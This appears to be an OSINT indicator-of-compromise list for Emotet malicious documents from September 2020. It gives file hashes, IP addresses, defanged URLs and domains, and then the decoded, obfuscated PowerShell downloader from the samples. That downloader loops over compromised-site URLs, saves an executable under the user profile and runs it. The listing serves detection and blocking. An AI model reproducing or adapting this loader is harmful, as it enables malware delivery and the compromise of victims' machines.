Emotet_Doc_out_2020-09-14_22_25.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. 28c80f27f09dddc1af681edceb122d548ac17c2d39a92d17026d45b3cf3ad6fd
5. 785e1a7b7818be6954ac21f9d27f2d52615235cd8915f6580b94a3ccf806c8ee
6. f8e3f7ec699ba3ec6580deed857867ec0f067538a224908d2dd48bb6b1bb8fac
7. 813835e555a57244f759ea1f03dd32d05bc472af33d6ed3c4ff22fc850798fe3
8. 3b211810dcd8176df286ff6d29407b15b8977014c8a22899ef51874995c40462
9. f1f5cf89e4efd6d4fda071cfc2489dc4f7ebbee392f80bcfda05d7b16a296d72
10. 79717451025cac2820d0e2aeb5f9cc7b8df2fd300b3c76c4dcacbf8605746deb
11. 7d3c7910d791d2695cbfbe9c9a3c1d9422ce6fdbea545343e7092c073c8ab4a5
12. 506bd0bf18d33b2e92b6638ec09ed0af6dcedffe870c41063f7845695e19fbc4
13. e2d78cd26f57320bd4d389bca9a102cb68b93213ef40646d7d75edee2b627bb1
14. 31948483fc5ed6d49d09367c9dd1e1d602a0124ce7f4758a4ec04c3c9b71c2fb
15.  
16.  
17. IPs:
18. 104.194.10.93
19. 104.27.155.238
20. 104.27.186.49
21. 104.27.187.49
22. 108.167.188.50
23. 136.144.213.181
24. 144.168.41.18
25. 144.208.79.23
26. 144.76.42.253
27. 164.68.111.62
28. 166.62.108.196
29. 172.67.140.13
30. 185.169.97.243
31. 185.195.15.164
32. 185.2.4.71
33. 185.66.41.119
34. 191.6.196.118
35. 192.185.215.162
36. 207.244.248.53
37. 31.186.8.162
38. 45.119.81.203
39. 46.183.8.124
40. 46.28.2.41
41.  
42.  
43.  
44. URLs:
45. hxxp://personalizzabili.com/images/lvyX7QK/
46. hxxp://www.bismarjeparamebel.com/u/qkhyf/
47. hxxp://agenciatabletshouse.com.br/erros/1PM/
48. hxxp://desk4succes.nl/stats/cNFjYB/
49. hxxp://westerndata.com.au/wp-includes/3jp/
50. hxxp://graphicom.it/cgi-bin/HsPkL/
51. hxxp://oneinsix.com/test/1F4c/."sP`LiT"[char]42;
52. hxxp://academiadotrader.net/wp-content/f/
53. hxxp://whitegoldinitiatives.org/wp-admin/d/
54. hxxps://lifeadvicer.com/wp-content/L/
55. hxxp://intc.solutions/wp-content/qi6/
56. hxxp://sanatcifiyatlari.net/dup-installer/5/
57. hxxps://www.letslearntech.com/wp-content/u/
58. hxxps://sublimatransfer.com/backup28082020/Ir/."S`plIT"[char]42;
59. hxxps://blueyellowshop.com/wp-includes/mihae8A/
60. hxxp://kingsalmanquran.com/wp-content/wuPyeI/
61. hxxps://dagranitegiare.com/wp-admin/Z21r6R/
62. hxxp://acontarborreguitos.com/acontarborreguitos/I/
63. hxxp://atenaclinicaesegurancadotrabalho.com/cgi-bin/NlMH/
64. hxxp://digitalbazar.com/wp-admin/RVEzrK/
65. hxxps://byc-center.com/wp-admin/Z4r/."sP`lit"[char]42;
66.  
67.  
68. Domains:
69. personalizzabili.com
70. www.bismarjeparamebel.com
71. agenciatabletshouse.com.br
72. desk4succes.nl
73. westerndata.com.au
74. graphicom.it
75. oneinsix.com
76. academiadotrader.net
77. whitegoldinitiatives.org
78. lifeadvicer.com
79. intc.solutions
80. sanatcifiyatlari.net
81. www.letslearntech.com
82. sublimatransfer.com
83. blueyellowshop.com
84. kingsalmanquran.com
85. dagranitegiare.com
86. acontarborreguitos.com
87. atenaclinicaesegurancadotrabalho.com
88. digitalbazar.com
89. byc-center.com
90.  
91.  
92. Decoded Base64 Powershell:
93. $Fretz5y=Dkbc63r;
94. .new-item $enV:UseRpRofile\R0Ulrrw\Ae5LEy5\ -itemtype DireCTory;
95. [Net.ServicePointManager]::"SEcUR`I`TY`protOcOL" = tls12, tls11, tls;
96. $Gd55icf = It3o0t4d;
97. $Wi9y5ov=Sw20xp5;
98. $Odmjcre=$env:userprofileE6KR0ulrrwE6KAe5ley5E6K."r`EPLA`ce"[chAR]69[chAR]54[chAR]75,\$Gd55icf.exe;
99. $Qhgpuxj=H_v8pg1;
100. $Pc2zwac=.new-object nET.wEbcliENT;
101. $Ji4kgyw=hxxp://personalizzabili.com/images/lvyX7QK/
102. hxxp://www.bismarjeparamebel.com/u/qkhyf/
103. hxxp://agenciatabletshouse.com.br/erros/1PM/
104. hxxp://desk4succes.nl/stats/cNFjYB/
105. hxxp://westerndata.com.au/wp-includes/3jp/
106. hxxp://graphicom.it/cgi-bin/HsPkL/
107. hxxp://oneinsix.com/test/1F4c/."sP`LiT"[char]42;
108. $Ab5v1il=M4eg1vz;
109. foreach$Pqxpns5 in $Ji4kgyw{try{$Pc2zwac."dOW`Nloa`dfilE"$Pqxpns5, $Odmjcre;
110. $Ycllwz9=Zko54z6;
111. If &Get-Item $Odmjcre."LENG`TH" -ge 30858 {&Invoke-Item$Odmjcre;
112. $B0vvjwp=H02sd91;
113. break;
114. $M0m6odl=Pwp6rd4}}catch{}}$Pjywetz=Xpm2g18$Nkvruo1=Uct6xtv;
115. &new-item $eNV:UserPrOfile\WjJDXya\XIaRZ6E\ -itemtype diReCTOry;
116. [Net.ServicePointManager]::"se`cURi`TyP`ROTOcoL" = tls12, tls11, tls;
117. $P3ghaap = Kanb27zv;
118. $Obyzcb2=Vz2p9fr;
119. $Gje08zu=$env:userprofileoHYWjjdxyaoHYXiarz6eoHY -crEPLACE [ChAr]111[ChAr]72[ChAr]89,[ChAr]92$P3ghaap.exe;
120. $Ilvef0o=Kczscwy;
121. $Isw52zm=&new-object NeT.WebCLienT;
122. $Qm4ex42=hxxp://academiadotrader.net/wp-content/f/
123. hxxp://whitegoldinitiatives.org/wp-admin/d/
124. hxxps://lifeadvicer.com/wp-content/L/
125. hxxp://intc.solutions/wp-content/qi6/
126. hxxp://sanatcifiyatlari.net/dup-installer/5/
127. hxxps://www.letslearntech.com/wp-content/u/
128. hxxps://sublimatransfer.com/backup28082020/Ir/."S`plIT"[char]42;
129. $Aiamci1=Uh456hs;
130. foreach$Q5zhk__ in $Qm4ex42{try{$Isw52zm."do`W`Nloa`DfIlE"$Q5zhk__, $Gje08zu;
131. $Wtoueqd=Qakaniv;
132. If .Get-Item $Gje08zu."l`e`NgtH" -ge 24748 {&Invoke-Item$Gje08zu;
133. $Eozeerd=Om9fv4h;
134. break;
135. $Vxuhdqu=L1b01yu}}catch{}}$O4y4422=I9vegqc$Q_f7wys=Qboz3sz;
136. .new-item $eNv:uSErpROFile\PfnoyhG\w2lwD2_\ -itemtype DIREcTORy;
137. [Net.ServicePointManager]::"sE`c`UrI`Ty`prot`ocOL" = tls12, tls11, tls;
138. $Aeb370c = Pcy7xg6;
139. $Vg0pvs2=Dre75hg;
140. $Ra85g8d=$env:userprofilelBFPfnoyhglBFW2lwd2_lBF."r`epLace"[CHaR]108[CHaR]66[CHaR]70,[StrIng][CHaR]92$Aeb370c.exe;
141. $Rs2x5s0=B0aade9;
142. $Oht57tr=.new-object nET.weBclIEnt;
143. $U27o44j=hxxps://blueyellowshop.com/wp-includes/mihae8A/
144. hxxp://kingsalmanquran.com/wp-content/wuPyeI/
145. hxxps://dagranitegiare.com/wp-admin/Z21r6R/
146. hxxp://acontarborreguitos.com/acontarborreguitos/I/
147. hxxp://atenaclinicaesegurancadotrabalho.com/cgi-bin/NlMH/
148. hxxp://digitalbazar.com/wp-admin/RVEzrK/
149. hxxps://byc-center.com/wp-admin/Z4r/."sP`lit"[char]42;
150. $Dybp1ck=Heukn4u;
151. foreach$Hz7jbau in $U27o44j{try{$Oht57tr."DownLOA`D`FILE"$Hz7jbau, $Ra85g8d;
152. $X2iepix=Fvoxr2g;
153. If .Get-Item $Ra85g8d."LeN`GTh" -ge 20136 {&Invoke-Item$Ra85g8d;
154. $Q2ff2iv=Pm19yaj;
155. break;
156. $Pem85c9=Shfzxzu}}catch{}}$O31cpjf=Q7579pu